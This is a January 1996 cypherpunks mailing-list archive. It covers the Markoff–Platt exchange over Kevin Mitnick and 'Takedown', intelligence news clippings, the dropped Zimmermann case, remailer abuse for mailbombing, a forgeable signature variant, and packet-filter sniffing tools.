  >that, according to JM's own book _Takedown,_ law enforcement had to be
  >prodded into taking action. They seemed not to share JM's perception of
  >Mitnick as a severe threat. They certainly didn't characterize him as one
  >of "America's most wanted."
 
  Since when is "notorious" a vague term? The dictionary def. of notorious is
 "generally known and talked of." Kevin Mitnick had national press attention
 in at least two cases (Los Angeles 1981 and Los Angeles 1987) and there were
 a number of articles in the Los Angeles Times, which the last time I checked
 was not a hacker quarterly, before Katie and I wrote about him in Cyberpunk.
 He was notorious.
 
 Charles is just plain wrong about the issue of pursuit: There was a US
 Marshalls search for him for a parole violation, a team of FBI agents in LA
 was detailed to finding Mitnick, telecommunications companies in Seattle and
 Southern California were pursuing him, California DMV had a special
 investigator looking for him. I could go on....Law enforcement did not have
 to be prodded into action. The first thing Tsutomu did when he was invited
 to the Well was meet with a US attorney and FBI agents who had an open case.
 
 
 
 
      In response to my statement that Kevin Mitnick has never been accused
      of intentionally damaging a computer, JM writes: "Wrong again. He was
      accused of doing more than $100,000 damage at US Leasing, a SF time
      sharing company in 1980. Their system was trashed by a group that
      Mitnick was a member of. After that, at various other times he cost
      companies tens of thousands of dollars trying to close the door on his
      attacks.
 
  >With all due respect, this is not fair or accurate journalism. Was Mitnick
  >*active* in the group that caused the alleged damage? Did he play a
  >personal role? Does JM know? If not, he's just slinging mud. This is a
  >smear and should not be presented as if it is a fact. On the other hand,
  >if there is evidence that Mitnick was indeed actively responsible, I will
  >gladly admit that I didn't know of this.
 
 
  Kevin was convicted in this case in the Spring of 1982. He spent 90 days in
 juvenile detention, he was given a year's probation.
 
 
  >As for the money that companies spent fixing the security weaknesses that
  >allowed Mitnick to gain access, it is grossly unfair and misleading for
  >JM to throw this into a paragraph discussing "intentional damage." This
  >is exactly the kind of deliberate blurring of different kinds of computer
  >misuse that I complained about in my review.
 
 
  I'm afraid that Charles has confused me here. I simply gave an example
 where intentional damage was done for which Kevin was convicted. I didn't
 say that he always damaged machines, I simply object to the portrayal of him
 as an innocent
 
      Regarding Mitnick's "most wanted" status, JM writes:  "Sorry, but I
      didn't create the character, Kevin did. He has now been arrested six
      times in fifteen years. Each time, except for this last time, he was
      given a second chance to get his act together. He chose not too. It
      seems to me that he is an adult and makes choices. He chose to keep
      breaking in to computers. He knew what the penalty was. So what's the
      problem?"
 
  >Of course Mitnick is responsible for his actions. I never disputed this,
  >and never suggested he was innocent of the crimes for which he was
  >convicted. I merely suggested that the crimes were relatively trivial and
  >were exaggerated out of all proportion by JM's extravagant prose.
  >Exaggeration, imprecision, and innuendo: *that's* the problem, JM.
 
 In a passage above Charles accuses me of being vague, now he says that
 exaggeration, imprecision and innuendo are the problem. Boy, talk about
 being vague. But I guess we've descended to the nyah, nyah level....  8)
 
 
 
      JM writes: "A witch hunt? Give me a break. It was an article
      describing a law enforcement hunt for a fugitive, who had been
      arrested five times previously, convicted at least three times, and
      was known to be attacking the computers of the nation's cellular
      telephone companies."
 
  >My review complained that JM throws around words such as "attack" without
  >ever defining them in computer terms. He's still doing it here in his
  >rebuttal. Kevin Mitnick never attacked any computer, by my understanding
  >of the word.
 
  Mitnick was persistent and frequently arrogant in his break-ins into dozens
 of different computers. Attack is not an exaggeration.
 
 
 
 
      Re Mitnick's dangerousness, JM writes: "This is just not true. Kevin
      Mitnick was actively sharing system vulnerabilities with other people
      on the net. That is about the most damaging thing that could be done
      to the Internet community."
 
  >Is JM aware that some highly respected security experts believe that
  >sharing news of vulnerabilities is the best way to encourage better
  >security?  True, this is a controversial subject; but certainly the
  >sharing of vulnerabilities is NOT "the most damaging thing that could be
  >done to the Internet community." That's just another of those wildly
  >exaggerated phrases that JM throws out for emotional effect. I can think
  >of many politicians--and even a few journalists--who pose a far greater
  >danger to the future of the net than Kevin Mitnick ever did.
 
  Charles probably missed the followup discussion on this point, but I think
 there is a dramatic difference between distributing information publicly and
 sharing it in a clandestine fashion with a small gang of crackers the way
 Mitnick was doing it. I assume from his comments that Charles thinks that
 issues like Internet privacy and security are trivial and don't really
 matter very much. I disagree with him here.
 
 
 
      Re the petty gossip in _Takedown,_ JM writes: "The reason we described
      what happened at Toad Hall on Xmas was that the attacks first came
      from toad.com while Tsutomu and Julia were there. If we hadn't have
      been complete in our description someone would have charged us with a
      cover up. Please remember that David Bank, a San Jose Mercury
      reporter, spent several weeks pursuing the hypothesis that Tsutomu had
      attack his own computers."
 
  >Uh-huh. And I suppose the rest of the sordid, relentlessly personal thread
  >in _Takedown,_ describing every little nuance of Shimomura's campaign to
  >steal someone's long-term girlfriend, was merely included so that no one
  >could complain that the account was incomplete? Really!
 
 Sharon Fisher had a good response to the notion of girlfriend as property.
 Charles is being viciously innaccurate here.
 
 
      In my review, I complained about pejorative terms (such as "attack")
      that JM uses repeatedly. His response: "Perjorative?? Yikes! I mean we
      could go to the dictionary....."
 
  >Well, I guess JM *should* go to the dictionary. If he does, he will find
  >that pejorative is a perfectly good word which I spelled correctly. It's
  >ironic that he seems unaware of it, since it so aptly describes his
  >own journalistic technique.
 
  This is getting weird again. I still don't have any problem with using the
 word "attack" and would use it again. I think Charles has sort of run out of
 gas trying to mount a defense against something that is basicly
 indefensible. It's just not ok to read other people's mail, steal commercial
 software, leave trojan horses scattered around, and systematically alter
 system software. No matter how you dress it up, its criminal activity.
 
 
      Re my assertion that all charges but one against Mitnick have been
      dropped, JM replies: "Wrong. Kevin Mitnick is in jail in Los Angeles
      facing charges from more than six United States Federal Districts. He
      may go on trial or he may plea bargain."
 
  >I tried to contact Mitnick's attorney before I wrote my review. He did
  >not return my calls. I based my statement on information from three other
  >sources. If it's incorrect, obviously I stand corrected. As I understand
  >it, though, those charges from other federal districts may not have been
  >actually filed. Is "facing charges" another of those slightly misleading
  >terms that makes the situation sound worse than it really is? Are the
  >charges actual, or potential?
 
 Why didn't Charles think to give any of half a dozen US District Attorney's
 a call and chat with them about the charges that are being brought against
 Kevin Mitncik. For those who are curious there is a plea bargaining process
 going on now and Mitnick has a scheduled court date for January 29.
 
 
 
      Finally JM writes: "Myth and reality? I have been writing about Kevin
      Mitnick for a long time, since 1981 to be precise, but I didn't create
      a myth, he created his own story."
 
  >In his own rebuttal, JM has already referred to the Mitnick story as a
  >"good yarn." A yarn, of course, is a richly embroidered, sometimes
  >fictionalized version of the truth. This is precisely what I believe he
  >concocted, and it isn't my idea of decent journalism.
 
 
 
 Please Charles, which part is concocted? The part about Kevin being a
 criminal who was a fugitive and who was caught while he was breaking in to
 computers?
 
 
 
 
  >Would JM like to explain how Dan Farmer's perception of "the Mitnick
  >threat" can be so different from Shimomura's? To the outside observer, it
  >almost looks as if there wasn't a significant security threat, and
  >Shimomura must have been motivated by wounded vanity, while John Markoff
  >was motivated by his desire to tell a "good yarn" and make a lot of money.
  >Am I wrong?
 
  Yes you're wrong. I can't speak for Dan, but Tsutomu was invited by both
 the Well and Netcom to help them solve a persistent computer security
 problem. His advice to the Well was that they would never be secure unless
 the person who was attacking their computers was apprehended. The Well had
 no viable way to lock Kevin Mitnick out. Tsutomu's solution to actively
 pursue Mitnick was the only reasonable option, one which the Well management
 agreed with. There are several philosophies in the computer security world.
 One view is that rather than hiding in your shell it is necessary to track
 down offenders who have broken the law. I really don't see what's wrong with
 that approach. Do you Charles?
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 13 Jan 1996 00:56:02 +0800
To: cypherpunks@toad.com
Subject: Mitnick #4: Platt's final response to Markoff
Message-ID: <IkxcOg600YUq45_AVc@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Topic 1119 [media]:  Media Appearances of WELLperns VI, S.F.Bay Area Division
#217 of 296: Aaron L Dickey (kieran)      Wed Jan  3 '96 (20:19)     7 lines

 Charles Platt responds:
 
 "John Markoff's reply to my replies is much more factual and convincing
 than his original response to my review of his book. I thank him for his
 time and trouble. I still find it hard to agree with his overall
 perspective, but I am now convinced that he does have a sincere point of
 view, and I value the instances where he has corrected me on details."

Topic 1119 [media]:  Media Appearances of WELLperns VI, S.F.Bay Area Division
#223 of 296: Declan McCullagh (declan)      Thu Jan  4 '96 (07:33)    23 lines

 And one final response from Charles Platt:
 
 "Someone suggested that by criticizing TAKEDOWN I attempted to further my
 own career.
 
 "My primary career has nothing to do with computer journalism. Under a
 different name I write a series of prehistory novels, the first of which
 now has 200,000 copies in print. This is my main source of income; I
 pursue computer journalism as a sideline, because it pleases me.
 
 "I do have a computer-related book coming out under my own name later this
 year, but it was written more for pleasure than profit and is aimed at a
 small audience: people who are more concerned about really dangerous
 criminals such as James Exon or Ralph Reed than about hackers such as
 Kevin Mitnick. Frankly, this book will not sell a lot of copies no matter
 what I do, because decency legislation and first-amendment issues are a
 noncommercial topic compared with so-called computer crime.
 
 "Bearing all this in mind, it is misleading to suggest that I wrote my
 review for motives of self-promotion. I wrote it because I had just
 finished reading TAKEDOWN, it had irritated me greatly, and I believed
 (perhaps wrongly) that I possessed background information that might not
 be mentioned by other reviewers elsewhere."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 13 Jan 1996 01:31:56 +0800
To: cypherpunks@toad.com
Subject: SPO_oks
Message-ID: <199601121607.LAA09897@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-12-96. WashP:

   "Agencies Debate Value of Being Out in the Cold. Spies
   Under 'Nonofficial Cover' Are Among Most Sensitive
   Operations."

      Today, as the roles and missions of American spying are
      being reviewed, one of the most sensitive debates in the
      U.S. intelligence community is whether to step up the
      overseas use of NOCs, not only by the CIA but also by
      the Pentagon's Defense Humint Service and the FBI, both
      of which also can work abroad under cover.

      Because they operate alone and outside embassies, NOCs
      need their own secure communications and a safe way to
      keep their highly classified files.


   1-11-96. WashP:

   "Israeli Media Break Censorship Rules to Name New Security
   Service Head."

      The man who will take the reins of Israel's Shin Bet
      security service, Rear Adm. Ami Ayalon, was named today
      in Israeli news accounts for the first time in the
      history of the secretive organization. Israeli media
      have yet to name Ayalon's predecessor, Karmi Gilon, who
      was still referred to today as "Kaf."


   1-11-96. FinTim:

   "Yeltsin's New Spy Master to Play by the Rules."

      Mr Trubnikov will be the first spymaster to work under
      new legislation which says the intelligence services
      must  use "a combination of open and secret methods and
      tactics and in accordance with the principle of legality
      and respect for human rights and freedoms". Separately,
      Mr Yeltsin signed a decree limiting phone taps and the
      unauthorised collection of information on firms and
      individuals. But Tass, which reported the decree, gave
      no details of how it would work.


   SPO_oks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Sat, 13 Jan 1996 02:51:11 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Censorship as Theater: Media Coverage of the Internet
Message-ID: <v01530500ad1c3a0b8cbe@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


Censorship as Theater

Several members of the list have complained of how the TV press portrays
the Web and the USENET as central casting for pederasts, copperheads and
narco-terrorists. I know, I've sent a couple of email messages to local TV
news outlets complaining about the broad brush of tar they've been
slinging. However, I don't think all the letters and education seminars
will do a bit of good. Because TV is not suited to presenting detailed or
sophisticated issues. TV is well-suited to telling exciting narratives full
of thrills. Given that TV news must compete with Roseanne and Vanna (and
Roseanne's writers do better narrative than Bosnian Serbs,) of course the
Internet will be portrayed as a thrilling interzone of thugs (aryran
nations), outlaws (Zimmerman), abominations (kiddieporn) and kooks (the
EFF,) with a few good guys (Exon and Shimomura) from "High Noon". The whole
thing will be presented as almost completely unrelated to the lives of the
viewer (the fantasy element) except when it can be used melodramatically
(cut to ur-bimbo gone good-nick and a blue binder full of GIFs, followed by
mother hovering over child gravely asking for the 1st amendment to be
torched for the good of the kiddies.) It's great theater, bad discourse.

Of course, there are opportunists such as the Christian Coalition; Cold,
Drug and Flu Warriors who exploit the theater and provide characters and
plot points to inflence the show their way.

Unfortunately, for all our nerdiness, many of us still think that civil
discourse really exists. We think we can influence public debate through
reasoned argument. We can't because reasoned argument isn't good TV. Does
this mean the 'forces of light' (as John Leonard describes us
anti-censorship types) should exploit the dominant means of persuasion and
construct simple narratives that make our side look like the good guys?

Turning anti-censorship into theater ignores the basic idea we're arguing
for, and reduces us to another clade of marketing nerds. To carry the day,
we have to take the arguement outside of the TV and other media influenced
by TV. It means you have to talk to your neighbours, friends, and families
and tell them why censorship is bad.

Suggested Reading:

Postman, Neil, _Amusing Ourselves to Death_, Balantine Paperback
Leonard, John, _The Last Innocent White Man in America_, New Press, pp. 48-57

-- (c) 1996 by Bill Humphries

Bill Humphries \/\/\/ bill.humphries@msn.fullfeed.com /\/\/\ Madison, WI, USA
PGP Public Key Fingerprint = 84 05 17 9D B9 6E 2D FE  A7 D1 E0 DC D0 96 63
FB






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 13 Jan 1996 08:40:53 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <UkxblKu00YUqI5_61_@andrew.cmu.edu>
Message-ID: <199601121722.LAA04179@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>       "This decision shouldn't be interpreted as meaning
>       anything. I caution people against concluding the
>       Internet is now free for export."


PRZ's experience underscores the importance of support from large
institutions like MIT and AT&T.  It's a lot easier to push around an
individual who doesn't have a lot of money or clout than it is to push
around MIT. 

We need a large sponser who is willing to run a more ambitious crypto
archive.  If an institution like MIT hosted a more generalized site where
people could distribute code, it would go a long way towards thawing out
the chill the government's managed to create by harassing PRZ. 

I know it took a lot of negotiating for MIT to set up the PGP distribution
site.  But now that they've provided a home for PGP, how much more risk
would they be taking on if they added other crypto software to the
archive?  Would exporting other crypto software violate ITAR more
significantly than exporting PGP would?

The government's policy doesn't prevent crypto from spreading around the
world, but it does discourage a lot of people from distributing code 
they've written or modified.  That's the point of the policy, and from 
their point of view it's probably a big success.

It would be a big win if we could come up with a system that would allow
anyone to contribute code in relative safety.  It would be the difference 
between having a lot of hand waving discussions about protocols and 
developing real tools.  The groundwork is already there -- good crypto 
libraries exit.  There's a lot of interest.  We'd probably see an 
explosion of ideas and code if people weren't being intimidated.

Even though it's possible for almost anyone to set up an archive that
imposes the same sorts of rules as the MIT archive on downloaders, it's
not the same thing.  If Alice puts code up in MIT's archive, it's hard for
the government to come at Alice without taking on MIT at the same time. 
Alice didn't export the code;  she gave it to MIT.  If they come after
MIT, they know it will lead to lots of press coverage.  People pay
attention to what MIT has to say about technology, and if MIT says that
it's important for people to be able to work on crypto code, it's going to
carry a lot of weight.  If I put up an archive, they can grind me out 
with legal fees in no time at all;  MIT isn't so vulnerable to that kind 
of an attack.

The point of the government's policy is to create a chilling effect on
development.  That's what we ought to fight against.  Our position is
similar to that of a little kid in grade school who's getting beat up by a
bully every day.  We need to make friends with a big guy who can keep the
bully off our back.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 1996 03:56:43 +0800
To: sameer <sameer@c2.org>
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <199601121631.IAA03887@infinity.c2.org>
Message-ID: <Pine.ULT.3.91.960112112213.10905J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996, sameer wrote:

> > > control what information is passed out to the other end. 
> > > Specifically, I'd like http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl 
> > > to come up nearly blank.)
> > 
> >   We do not send the HTTP 'From:' header.  I will look into where
> > they are getting the user name and location from.  There is really
> > nothing I can do in the Navigator to stop them from getting your
> > IP address or DNS name.
> 
> 	I beleive that it uses finger. If you really want to prevent
> people from finding out where you're coming from, use the
> anonymizer. Not at CMU? Don't worry.

On most UNIX machines or a Mac or PC running most common talk clients?
Worry. Not just finger, but also identd will identify you. I think Eudora
Pro has an identd option, too. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Sat, 13 Jan 1996 03:55:54 +0800
To: cypherpunks@toad.com
Subject: Re: p-NEW digital signatures
In-Reply-To: <960112182626_72124.3234_EHJ93-1@CompuServe.COM>
Message-ID: <m0tapC8-000ungC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Kent Briggs <kbriggs@execpc.com> wrote:
>s is discarded and the signature is r and z.  The verification is:
>
>m=zy^r mod p
>
>This slows down the signing but speeds up the verification.  Here's the $64K
>question:  Does this compromise the signature's security?

Yes.  In this case a fake signature can be forged by picking a random r, and
then z can be calculated as:

z=my^(-r) mod p

No security at all.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kolivet@alpha.c2.org
Date: Sat, 13 Jan 1996 19:43:17 +0800
To: cypherpunks@toad.com
Subject: Mail to news gateways
Message-ID: <199601121935.LAA01761@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Could someone point me to a _current_ list of mail to news gateways?

- Kay Olivetti





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 13 Jan 1996 01:36:18 +0800
To: "Declan B. McCullagh" <declan+@cmu.edu>
Subject: Re: Mitnick: Markoff responds to Platt's CuD "Takedown" critique
In-Reply-To: <gkxcLeG00YUq85__A3@andrew.cmu.edu>
Message-ID: <199601121648.LAA21298@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Declan B. McCullagh" writes:
[A large bunch of Mitnick crap]

THIS IS NOT MITNICK PUNKS.

I'm sick of seeing this. I and many others read this mailing list for
information on CRYPTOGRAPHY. If and when you can demonstrate why there
is a link between, say, factoring and whether John Markoff is
profiteering off of the Mitnick case, then this becomes relevant.

Until then, GET THE CRAP OFF.

(I've been writing people privately for some time. I'm again writing
in public because more and more people seem to be getting in to the
act.)

Perry

PS I'm really not interested in reading large chunks of information on
John Gilmore's or Tsutomu Shimomura's sex lives anywhere at all, but
I'm sure there is SOME mailing list where it is relevant. Why don't
you go and post the garbage there, eh?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Jan 1996 02:48:17 +0800
To: cypherpunks@toad.com
Subject: Next on "Geraldo": "Darkside Hackers in Love with their Trackers"
Message-ID: <ad1be7392002100487a2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:48 PM 1/12/96, Perry E. Metzger wrote:

>PS I'm really not interested in reading large chunks of information on
>John Gilmore's or Tsutomu Shimomura's sex lives anywhere at all, but
>I'm sure there is SOME mailing list where it is relevant. Why don't
>you go and post the garbage there, eh?

On this one I have to agree with Perry.

As I started to read the item someone posted (I have mercifully forgotten
the poster) about TS in the upstairs-hot-tub-with-waterfalls and the
Nepal-returned-starstruck lovers and their "committed" relationship, I felt
I'd opened a manhole above a sewer. Or tuned in to "Sally Jesse Raphael."

"Takedown" is one book I don't plan to even flip through at the bookstore.

No offense intended to John, Tsutomo, Kevin, Julia, Kent, Katie, or John.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 14 Jan 1996 00:22:57 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <Pine.ULT.3.91.960112112213.10905J-100000@Networking.Stanford.EDU>
Message-ID: <199601121956.LAA04644@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I'm sorry, I wasn't clear. That's not what I meant. (All I can
say at this time)


> 
> On most UNIX machines or a Mac or PC running most common talk clients?
> Worry. Not just finger, but also identd will identify you. I think Eudora
> Pro has an identd option, too. 
> 
> -rich
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 13 Jan 1996 04:27:01 +0800
To: cypherpunks@toad.com
Subject: PRZ "battle lost"
Message-ID: <199601122000.MAA18622@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



regarding PRZ,
SP wrote earlier that "we have gained nothing--the US can still harass
people over cryptographic algorithms".  

that's true, but that's a side effect of our legal system, not of our
secret government bureacracy (the NSA etc).

it has always been the case that someone with lots of money, time, and
lawyers can harass someone else in the courts without any leg to
stand on. the government does not have a monopoly on this capability,
and in fact they can arguably be shown to be a minor player when it
comes to what happens every day in the business world.

you can consume someone else's time and money significantly,
and scare them into submission, without ever even going to trial, through
pre-trial hearings and all that kind of thing.

is there an alternative? yes, but it involves fewer lawyers than are
in the US today.

however I don't see lawyers as the problem, but a symptom of something
deeper: the tendency of people to resort to legal action to settle
even trivial disputes.

I for example am aware of a case where someone threatened to sue a 
well-known kook on the internet for "libel" for material that was
clearly satire, and the supposed "libel" was committed--AGAINST A PSEUDONYM!!

so to me all the lawyers are not the problem, but the attitude in our
society that if you have been offended in some way, you should 
use the legal system to get "justice".

a rather immature kind of mentality, of course, but who am I to criticize
an infant for being an infant? I suppose its partly my mistake if I
run into an adult that is actually an infant and I don't realize it at
first.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 1996 04:34:53 +0800
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Q6q9w8m9LYlM085yn@netcom.com>
Message-ID: <Pine.ULT.3.91.960112115942.10905O-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996, Alan Bostick wrote:

> Somebody, too clever for their own good by half, has come up with a
> novel way of using Usenet and anonymous remailers to perpetrate
> mailbombs.  The M.O. is to post a message to the naked-lady newsgroups
> saying "get pics in your mailbox! send this message to this address!),
> giving the email address of a cypherpunk-style anonymous remailer and
> including a pgp-encrypted message block.

Yuck.

Unless someone comes forward to say that they were the target of this 
attack, I'd guess that the target is the remailer network itself.

> > Xref: netcom.com alt.sex:292849 alt.sex.wizards:44144 alt.sex.magazines:11634 alt.binaries.pictures.erotica:364153 alt.binaries.pictures.erotica.blondes:48686 alt.binaries.pictures.erotica.female:130066 alt.sex.movies:91249 alt.sex.pictures:98757
> > Newsgroups: alt.sex,alt.sex.wizards,alt.sex.magazines,alt.binaries.pictures.erotica,alt.binaries.pictures.erotica.blondes,alt.binaries.pictures.erotica.female,alt.sex.movies,alt.sex.pictures
> > Path: netcom.com!ix.netcom.com!howland.reston.ans.net!news.sprintlink.net!nuclear.microserve.net!luzskru.cpcnet.com!www-39-190
> > From: luzskru@cpcnet.com (luzskru)
> > Subject: Get Penthouse and Playboy pics on your mail box!!
> > Message-ID: <1b7cc$12a26.20@luzskru.cpcnet.com>
> > Date: Thu, 11 Jan 1996 18:10:37 GMT
> > Organization: http://www.cpcnet.com/~luzskru/home.htm
> > X-Newsreader: News Xpress Version 1.0 Beta #4
> > Lines: 119

This article is still on nntp.stanford.edu. I've issued a cancel. Sites far 
removed from stanford.edu should consider doing the same.

luzskru@cpcnet.com, of course, doesn't exist, *BUT* there is a 
luzskru.cpcnet.com in the DNS.

And while every other port seems to be closed, there is an open NNTP port.

N:~> telnet luzskru.cpcnet.com nntp
Trying 198.70.185.5...
Connected to luzskru.cpcnet.com.
Escape character is '^]'.
200 luzskru.cpcnet.com NNS server version X2.06 ready - posting allowed
quit
205 closing connection - goodbye
Connection closed by foreign host.

postmaster@cpcnet.com is probably a victim of this, but he should still be 
flayed with a wet noodle for letting this happen.
 
-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 1996 04:47:48 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Q6q9w8m9LYlM085yn@netcom.com>
Message-ID: <Pine.ULT.3.91.960112122428.10905Q-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I did an AltaVista search for "luzskru" and found it on a list of known 
open NNTP sites. They're almost certainly blameless.

The list, btw, is http://dana.ucc.nau.edu/~jwa/open-sites.html

Cc'd to the guy who generates that list. In case he doesn't know, 
cypherpunks is browseable at news://nntp.hks.net/hks.lists.cypherpunks

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Date: Fri, 12 Jan 1996 14:07:11 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: E-cash and Interest
In-Reply-To: <Pine.OSF.3.91.960110080858.22386A-100000@nic.wat.hookup.net>
Message-ID: <Pine.SUN.3.91.960112124749.6436B-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jan 1996, Tim Philp wrote:

> I think that you have hit the nail on the head. Money could still 'earn' 
> interest until it is spent. The 'bank' still has the 'real' money. In 

NO!  money could still earn interest untill it is _withdrawn_.  This 
includes withdrawals from MTB accounts into the Mint.  Coz ecash in any 
form (whether in the mint or in the HDD) is equivalent to cash.  And cash 
(by definition) cant earn interest.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 13 Jan 1996 06:22:07 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Pine.ULT.3.91.960112115942.10905O-100000@Networking.Stanford.EDU>
Message-ID: <199601122105.NAA00876@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves writes:
> 
> On Fri, 12 Jan 1996, Alan Bostick wrote:
> 
> > Somebody, too clever for their own good by half, has come up with a
> > novel way of using Usenet and anonymous remailers to perpetrate
> > mailbombs.  The M.O. is to post a message to the naked-lady newsgroups
> > saying "get pics in your mailbox! send this message to this address!),
> > giving the email address of a cypherpunk-style anonymous remailer and
> > including a pgp-encrypted message block.
> 
> Yuck.
> 
> Unless someone comes forward to say that they were the target of this 
> attack, I'd guess that the target is the remailer network itself.


The target, Homer Wilson Smith, is one of the people embroiled in
the Scientology wars.  I don't want to get into the recent history
of repression and abuse by Scientology agents & sympathizers, but
my guess is that this is an attempt to harass someone that
Scientology doesn't like.

They (Scientology) have shown a remarkable ability to grasp both the
technical details and social implications of the Internet and use them
to harass ex "church" members and people who say things that they
don't like.  The "church" undoubtably hates remailers because so many
of their critics post anonymously through them.  But as they discovered
with Usenet news, the same technology can be used to harass those
critics.

I think we'll see more ingenous attacks like this, using CP-tech in
perverted ways to harass people.  Annoying for sure, but helpful in
a way- they'll help debug the technology.  Like cipherpunks hacking
Netscape, in the end it just makes it stronger.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark (Mookie) <mark@zang.com>
Date: Sun, 14 Jan 1996 04:52:59 +0800
To: cypherpunks@toad.com
Subject: tsu's bpf
Message-ID: <199601122307.NAA09386@zang.com>
MIME-Version: 1.0
Content-Type: text


>>    Shimomura on BPF, NSA and Crypto:
>>
>>    One of the tools I modified for my work was a sophisticated
>>    piece of software called the Berkeley Packet Filter. ...
>>    Unlike the original BPF, my version was designed to bury
>	 ^^^^^^^^^^^^^^^^^^^^^^^
>>    itself inside the operating system of a computer and watch
>>    for certain information as it flowed through the computer
>>    from the Internet. When a packet from a certain address, or
>>    for that matter any other desired piece of information
>>    designated by the user flashed by, BPF would grab it and
>>    place it in a file where it could be kept for later
>>    viewing.
>
>This is *exactly* what BPF does, always did and was designed to do. As
>for writing the packets to a file, everything but opening and closing
>the file are described in the man page. You could code it in 10 lines.

Get off your high horse Julian, he means it's a modloadable version of bpf,
much like the modloadable NIT that is also available. There are at least
two sniffers that can use both the modloadable NIT and bpf packet interfaces,
maybe more. It certainly is easier than recompiling your kernel to include
the functionality which is generally the way things were done.

I prefer bpf as it is much more efficient, typically 10% of the impact that
NIT has on a machine. Some rough figures are a NIT might use one or two
minutes of CPU a day to monitor a reasonably quiet network, whilst bpf will
only use several seconds cpu time. (Most of the work is hidden in the kernel
anyway).

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Date: Fri, 12 Jan 1996 19:04:01 +0800
To: David Murray <davidm@iconz.co.nz>
Subject: Re: Some questions about ecash[tm]
In-Reply-To: <199601110932.WAA09988@iconz.co.nz>
Message-ID: <Pine.SUN.3.91.960112130809.6436G-100000@ipied>
MIME-Version: 1.0
